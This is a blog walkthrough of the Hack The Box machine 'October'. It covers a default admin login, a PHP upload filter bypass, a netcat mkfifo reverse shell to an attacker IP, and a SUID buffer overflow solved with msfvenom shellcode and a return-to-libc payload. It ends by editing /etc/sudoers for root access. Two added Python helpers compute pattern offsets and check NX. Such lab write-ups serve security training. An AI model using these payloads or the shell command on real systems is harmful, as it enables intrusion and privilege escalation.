October — HTB Walkthrough

Dhanishtha Awasthi
7 min read · Jul 15, 2020

Buffer Overflow, but not using shellcode. Great box; I learnt a lot about ASLR, the NX bit and the return-to-libc trick to bypass it and gain a shell. LET'S BEGIN.

ENUMERATION

Nmap Scan

Port 80 HTTP Enumeration

Visiting the website, I found a login and a register page.

Registered with username n00bDi and password abcdabcd. Could not find much on the website, so I decided to run a dirbuster scan.

Backend folder found

Traversing to backend

Auth Page

Signing in as admin:admin worked. If you don't see how, you can run Hydra too; it was a guess using the usual default credentials. We get the admin dashboard.

We see that we can upload files using any of these.

Uploading PHP through Media. Capture the request in Burp and change the extension from php to php5, as hinted by dr.ph5.

EXPLOITATION

Uploading the file with the changes described above.

We see a public URL is shown beside the file on this page; browse to abcd.php5. Keep msf exploit/multi/handler listening if you used the payload above to get a reverse shell. Otherwise, you can also use this as the payload in abcd.php5:

Keep netcat listening on port 1234, and in the URL you can use the cmd parameter as follows

Getting shell.

Using the pentest monkey netcat reverse shell, send the URL-encoded input to cmd=

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 1234 >/tmp/f

And on netcat we see

Getting shell as www-data
Getting User.txt

PRIVILEGE ESCALATION

Looking for SUID

We see here a file named ovrflw. Let's see what code it contains.

OK, this might be vulnerable to a buffer overflow: it uses strcpy, and its name suggests so. Running ltrace to see what input goes where.

Let’s copy this to our machine, using nc.

On the target machine
On your machine

Running the file in gdb and disassembling the main function

1) FUZZING

2) Finding offset

We see it lies between 110 and 120. So, keeping length = 120, we will create a pattern using metasploit-framework.

Now send this instead of A’s

We receive a segmentation fault at 0x64413764

We pass this as an argument to the pattern_offset script to determine the exact offset.

We find this at 112.
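To see why the crash value 0x64413764 maps to offset 112, here is an added example (my own code, not the author's script and not Metasploit's tool) that rebuilds the msf-style cyclic pattern and searches it for the little-endian bytes of the value gdb printed, the same thing pattern_offset does. Nothing here is taken from the box beyond the two numbers in the text.

```python
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3  # the pattern repeats after this many bytes


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern (Aa0Aa1Aa2 ... Ab0Ab1 ...) of `length` bytes."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_PATTERN)
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]


def pattern_offset(value, length=120):
    """Locate a crash value inside the pattern of the given length.

    `value` is either the 32-bit register contents gdb printed (an int, read
    little-endian as on the x86 target) or the four characters themselves (a str).
    Returns the byte offset, or -1 if the value did not come from the pattern
    (for example a register still holding the A's from the fuzzing step).
    """
    if isinstance(value, int):
        try:
            needle = struct.pack("<I", value).decode("ascii")
        except UnicodeDecodeError:
            return -1          # non-printable bytes cannot be part of the pattern
    else:
        needle = value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # The walkthrough's crash: EIP = 0x64413764 after sending a 120-byte pattern.
    eip = 0x64413764
    print("pattern:", pattern_create(120))
    print("EIP 0x%08x = %r -> offset %d" % (eip, struct.pack("<I", eip), pattern_offset(eip)))
```

Every three-character group has the form upper/lower/digit, so a four-byte window such as "d7Ad" is unique within the first 20280 bytes; that uniqueness is what makes a single crash value enough to recover the offset.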

3) Overwriting the EIP

Checking the value in the EIP register, we see it is filled with B's.

Checking EIP address

So now we will set a breakpoint at 0xfff4adbc and check if it hits

It hits

4) Shellcode

Using msfvenom we will create shellcode.

5) Sending payload

Using some padding, we will send our shellcode and the EIP overwrite as the payload. For this we write shell.py.

Here we are sending EIP = "A"s so that we can detect it easily on the machine. Now transfer this script to /tmp on the target machine using a Python HTTP server. Then, on the target machine, in /usr/local/bin:

We see EIP is overwritten with A's.

Now we will analyse the EIP register to get the address.

We see our shellcode starts at 0xbfd4397d, so we will change EIP to somewhere in the middle of the \x90s: 0xbfd43970

python -c 'offset = 112;shell="";shell +="\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +="\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e";shell +="\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +="\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab";shell +="\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +="\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b";shell +="\x70\x39\xd4\xbf";nop = "\x90"*(offset - len(shell));eip = "\x70\x39\xd4\xbf";payload = nop + shell + eip;print(payload)'

It kept giving a segmentation fault. Something was wrong, so I checked on the target machine.

ASLR was enabled

Also checking the protections on the file, to see why we cannot run the shellcode.

NX Enabled

NX enabled; no-execute: this means I cannot run shellcode on the stack here. Then what?

It's an exploit mitigation technique that makes certain areas of memory non-executable and makes executable areas non-writable. Example: the data, stack and heap segments are made non-executable, while the text segment is made non-writable.
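The "NX enabled" verdict above comes from one field in the binary: the PT_GNU_STACK program header, whose PF_X flag tells the loader whether the stack may be executable. The following added example (my own code, not part of the walkthrough and not the checksec tool) parses that header straight out of an ELF image so you can verify the stack protection of a binary such as ovrflw yourself, and reads the kernel's ASLR switch next to it. The build_minimal_elf helper only fabricates a header-plus-program-header sample for exercising the parser; it is a constructed input, not a loadable program.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header type carrying the stack permissions
PF_X = 0x1                  # segment is executable
PF_W = 0x2
PF_R = 0x4


def _program_headers(data):
    """Yield (p_type, p_flags) for every program header in an ELF image held in memory."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    elf_class, endian = data[4], data[5]
    e = {1: "<", 2: ">"}[endian]
    if elf_class == 1:      # ELF32, the class of a 32-bit x86 binary like ovrflw
        hdr = struct.unpack_from(e + "16sHHIIIIIHHH", data, 0)
        phdr_fmt = e + "8I"          # p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align
        flags_index = 6
    elif elf_class == 2:    # ELF64: p_flags is the second field of the program header
        hdr = struct.unpack_from(e + "16sHHIQQQIHHH", data, 0)
        phdr_fmt = e + "IIQQQQQQ"
        flags_index = 1
    else:
        raise ValueError("unknown ELF class %d" % elf_class)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    for i in range(e_phnum):
        fields = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        yield fields[0], fields[flags_index]


def stack_nx_status(data):
    """Classify the stack of an ELF image.

    'enabled'  : PT_GNU_STACK present without PF_X (NX stack, as on the box)
    'disabled' : PT_GNU_STACK present with PF_X (executable stack)
    'missing'  : no PT_GNU_STACK header, which the loader has historically treated
                 as a request for an executable stack
    """
    for p_type, p_flags in _program_headers(data):
        if p_type == PT_GNU_STACK:
            return "disabled" if p_flags & PF_X else "enabled"
    return "missing"


def build_minimal_elf(bits, stack_executable, with_gnu_stack=True):
    """Constructed sample: an ELF header plus one program header, just enough for the parser."""
    flags = PF_R | PF_W | (PF_X if stack_executable else 0)
    p_type = PT_GNU_STACK if with_gnu_stack else 1      # 1 = PT_LOAD
    if bits == 32:
        ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8      # class 32, little-endian, version 1
        header = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x08048000, 52, 0, 0, 52, 32, 1, 40, 0, 0)
        phdr = struct.pack("<8I", p_type, 0, 0, 0, 0, 0, flags, 16)
    else:
        ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8      # class 64, little-endian, version 1
        header = struct.pack("<16sHHIQQQIHHHHHH", ident, 2, 62, 1, 0x400000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", p_type, flags, 0, 0, 0, 0, 0, 16)
    return header + phdr


def aslr_level(path="/proc/sys/kernel/randomize_va_space"):
    """Read the kernel ASLR setting (0 off, 1 stack/mmap/vdso randomised, 2 also brk); None if unavailable."""
    try:
        with open(path) as fh:
            return int(fh.read().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:            # e.g. python3 nxcheck.py ./ovrflw
        print("stack NX:", stack_nx_status(fh.read()))
    print("ASLR level:", aslr_level())
```

The same two checks are what a hardening review looks for before a binary is shipped setuid: a PT_GNU_STACK header without PF_X, and randomize_va_space set to 2 on the host.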

With the NX bit turned on, our classic approach to a stack-based buffer overflow fails to exploit the vulnerability: in the classic approach, the shellcode was copied onto the stack and the return address pointed at it, but now that the stack is no longer executable, the exploit fails. This mitigation is not completely foolproof, though, so let's see how to bypass the NX bit.

The NX bit can be bypassed using an attack technique called "return-to-libc". Here the return address is overwritten with the address of a particular libc function (instead of the stack address containing the shellcode). For example, if an attacker wants to spawn a shell, he overwrites the return address with the address of system() and also sets up the arguments system() expects on the stack, so that it is invoked successfully.[1]

Return to libc is a method of exploiting a buffer overflow on a system that has a non-executable stack. It is very similar to a standard buffer overflow, in that the return address is changed to point at a new location that we can control.

Now, to check the memory address of libc, we can do the following[2]

Checking memory address of libc, /bin/sh, system and exit outside gdb.

Calculation

system: 0xb7582000 + 0x40310 = 0xb75c2310

exit: 0xb7582000 + 0x33260 = 0xb75b5260

/bin/sh: 0xb7582000 + 0x162bac = 0xb76e4bac

Format: offset * NOP bytes + system address + exit address + /bin/sh address (each address in little-endian byte order)

payload: $(python -c 'print("\x90"*112 + "\x10\x23\x5c\xb7" + "\x60\x52\x5b\xb7" + "\xac\x4b\x6e\xb7")')

We could have directly executed

/usr/local/bin/ovrflw $(python -c 'print("\x90"*112 + "\x10\x23\x5c\xb7" + "\x60\x52\x5b\xb7" + "\xac\x4b\x6e\xb7")')

But we get a core dump because ASLR is enabled, so we need to loop over it.

Address Space Layout Randomization (ASLR) is primarily used to protect against buffer overflow attacks. In a buffer overflow, the attacker feeds a function as much junk data as it can handle, followed by a malicious payload. The payload overwrites data the program intends to access.[3]

How does ASLR work? ASLR makes it harder for an attacker to execute a successful buffer-overflow attack by randomizing the offsets it uses in memory layouts, so that the addresses of libc, the stack and the heap change on every run.

Now we have the privilege to read root's files.

Getting ROOT Flag

POST EXPLOITATION

Since we have the privilege to open and modify files as root, we add ourselves to /etc/sudoers so that we don't need a password to run sudo, and then run su to switch to root.

Yeayyyy, we are root. ROOTED!!!

References:

[1]: https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/

[2]: https://www.google.com/search?client=firefox-b-d&q=libc+address

[3]: https://www.howtogeek.com/278056/what-is-aslr-and-how-does-it-keep-your-computer-secure/
